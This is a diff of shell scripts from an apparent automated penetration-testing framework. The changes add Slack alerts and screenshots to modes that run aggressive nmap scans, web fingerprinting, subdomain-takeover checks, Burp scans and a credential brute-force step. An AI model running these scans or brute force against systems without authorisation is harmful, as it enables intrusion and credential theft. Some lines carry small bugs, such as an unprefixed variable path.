/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
@ -71,5 +76,8 @@ if [ "$MODE" = "airstrike" ]; then
if [ "$LOOT" = "1" ]; then
loot
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
exit
fi

View File

@ -6,6 +6,9 @@ else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/credentials/brutex-$TARGET
@ -13,4 +16,7 @@ else
rm -f hydra.restore
rm -f scan.log
echo ""
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
fi

View File

@ -15,8 +15,12 @@ if [ "$MODE" = "discover" ]; then
mkdir $LOOT_DIR/scans 2> /dev/null
fi
OUT_FILE=$(echo "$TARGET" | tr / -)
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUTFILE-$MODE.txt 2> /dev/null
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ /\\"
@ -43,7 +47,6 @@ if [ "$MODE" = "discover" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
#nmap -T4 -v -sC -sA -sV -F $TARGET 2>/dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
nmap -T4 -v -p $QUICK_PORTS -sS $TARGET 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -58,7 +61,9 @@ if [ "$MODE" = "discover" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
#loot
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE
exit
fi

View File

@ -20,9 +20,7 @@ if [ "$MODE" = "flyover" ]; then
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m flyover --noreport --noloot"
TARGET="$a"
args="$args -f $FILE"
args="$args -f $FILE -m flyover --noreport --noloot"
echo -e "$OKRED "
echo -e "$OKRED . . "
echo -e "$OKRED // "'\\\\ '
@ -37,91 +35,75 @@ if [ "$MODE" = "flyover" ]; then
echo -e "$OKRED UUU UUU UUU "
echo -e "$OKRED "
echo -e "$RESET"
if [ ! -z "$WORKSPACE_DIR" ]; then
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$WORKSPACE-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
else
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$WORKSPACE-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$WORKSPACE-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python /usr/share/sniper/bin/slack.py "Starting scan: $FILE $MODE `date +"%Y-%m-%d %H:%M"`"
fi
args=""
fi
i=1
for HOST in `sort -u $FILE`; do
TARGET="$HOST"
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo -e "$OKRED=====================================================================================$RESET"
echo -e "${OKBLUE}HOST:$RESET $TARGET"
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
dig A +short $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null &
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
curl --connect-timeout 3 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
else
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
fi
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
i=$((i+1))
if [ "$i" -gt "20" ]; then
i=0
sleep 2
fi
done
sort -u $LOOT_DIR/domains/targets.txt 2>/dev/null >> $LOOT_DIR/domains/domains-all-sorted.txt
sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sleep 20
rm -f $INSTALL_DIR/wget-log* 2> /dev/null
echo -e "$OKRED=====================================================================================$RESET"
if [ "$LOOT" = "1" ]; then
loot
exit
else
for HOST in `sort -u $LOOT_DIR/domains/domains-all-sorted.txt $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null`; do
i=1
for HOST in `cat $FILE`; do
TARGET="$HOST"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo -e "$OKRED=====================================================================================$RESET"
echo -e "${OKBLUE}HOST:$RESET $TARGET"
echo -e "${OKBLUE}DNS:$RESET `cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null`"
echo -e "${OKBLUE}TAKEOVERS:$RESET ${OKRED}" && cat $LOOT_DIR/nmap/takeovers-$TARGET.txt 2> /dev/null
echo -en "${OKBLUE}TITLE:$RESET ${OKORANGE}" && cat $LOOT_DIR/web/title-htt*-$TARGET.txt 2> /dev/null
echo "-"
echo -e "${OKBLUE}HEADERS:$RESET"
cat $LOOT_DIR/web/headers-htt*-$TARGET.txt 2> /dev/null
echo -en "${OKBLUE}PORTS:$RESET "
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2`; do
echo -n "$PORT "
done
echo ""
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
done
fi
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null &
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
curl --connect-timeout 5 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
curl --connect-timeout 5 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
if [ $CUTYCAPT = "1" ]; then
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
else
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
fi
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80 2> /dev/null > /dev/null &
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443 2> /dev/null > /dev/null &
fi
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
i=$((i+1))
if [ "$i" -gt "$THREADS" ]; then
i=1
sleep 15
fi
done
sleep 15
sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
rm -f $INSTALL_DIR/wget-log* 2> /dev/null
killall webtech 2> /dev/null
echo -e "$OKRED=====================================================================================$RESET"
if [ "$LOOT" = "1" ]; then
loot
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $FILE $MODE `date +"%Y-%m-%d %H:%M"`"
fi
fi
exit
fi
fi

View File

@ -17,14 +17,21 @@ if [ "$MODE" = "fullportonly" ]; then
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m fullportonly"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-fullnmapscan.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
logo
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
if [ -z "$PORT" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
@ -33,21 +40,21 @@ if [ "$MODE" = "fullportonly" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml
nmap -Pn -sU -sV -A -T4 -v -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml -p $DEFAULT_UDP_PORTS $TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET
nmap -Pn -A -v -sV -T4 -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
fi
@ -55,6 +62,9 @@ if [ "$MODE" = "fullportonly" ]; then
echo -e "$OKRED DONE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
loot
exit
fi

View File

@ -4,9 +4,11 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL PORT SCAN $RESET"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
#nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running full port scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
@ -15,7 +17,10 @@ else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
fi

View File

@ -23,8 +23,12 @@ if [ "$REPORT" = "1" ]; then
args="$args -w $WORKSPACE"
fi
args="$args --noreport"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-normal.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
@ -50,7 +54,7 @@ echo -e "$OKRED GATHERING DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
dnsenum $TARGET 2> /dev/null
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
@ -73,6 +77,8 @@ echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$MODE" == "web" ]; then
nmap -sV -T5 -Pn -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
elif [ "$MODE" == "webscan" ]; then
nmap -sV -T5 -Pn -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
elif [ ! -z "$PORT" ]; then
nmap -sS -T5 -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
else
@ -384,6 +390,7 @@ else
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L http://$TARGET | tee $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
@ -402,17 +409,20 @@ else
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ $CUTYCAPT = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80
fi
source $INSTALL_DIR/modes/normal_webporthttp.sh
source $INSTALL_DIR/modes/osint_stage_2.sh
fi
@ -550,7 +560,7 @@ else
fi
fi
if [ -z "$port_161" ];
if [ -z "$port_161U" ];
then
echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET"
else
@ -640,6 +650,7 @@ else
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L https://$TARGET | tee $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
@ -677,6 +688,11 @@ else
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443
fi
source $INSTALL_DIR/modes/normal_webporthttps.sh
source $INSTALL_DIR/modes/osint_stage_2.sh
fi
@ -1186,6 +1202,9 @@ echo -e "${OKGREEN}=============================================================
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
if [ "$LOOT" = "1" ] && [ -z "$NOLOOT" ]; then
loot
fi

View File

@ -1,115 +1,133 @@
if [ "$MODE" = "web" ]; then
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
echo ""
fi
